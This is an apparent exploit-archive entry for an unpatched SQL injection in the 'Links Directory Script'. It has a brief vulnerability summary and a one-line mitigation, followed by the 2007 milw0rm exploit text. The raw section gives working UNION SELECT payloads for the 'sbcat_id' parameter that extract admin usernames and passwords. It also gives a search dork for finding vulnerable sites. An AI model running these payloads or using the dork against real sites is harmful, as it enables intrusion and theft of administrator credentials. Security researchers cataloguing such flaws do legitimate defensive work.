Links Directory Script SQL INJECTION

vendor:

Links Directory Script

by:

IRCRASH (Dr.Crash)

5.5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: Links Directory Script

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Links Directory Script SQL INJECTION

The vulnerability allows an attacker to inject SQL code into the "sbcat_id" parameter of the "searchresult.php" script in the Links Directory Script. By exploiting this vulnerability, an attacker can retrieve the admin username and password from the database.

Mitigation:

The vendor should sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#####################################################################################
####                   Links Directory Script SQL INJECTION                      ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#Script Download : http://www.softbizscripts.com/                                   #
#DORK: "Powered by SoftbizScripts" "OUR SPONSORS"                                   #
#                                                                                   #
#####################################################################################
#                                                                                   #
#Injection Adress : http://server.com/searchresult.php?sbcat_id=<SQL C0de>          #
#                                                                                   #
#SQL C0de For Find admin Username : 999999%20union/**/select/**/0,username,2,3/**/from/**/sblnk_admin/*
#SQL C0de For Find admin Password : 999999%20union/**/select/**/0,password,2,3/**/from/**/sblnk_admin/*
#                                                                                   #
#####################################################################################
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################

# milw0rm.com [2007-11-11]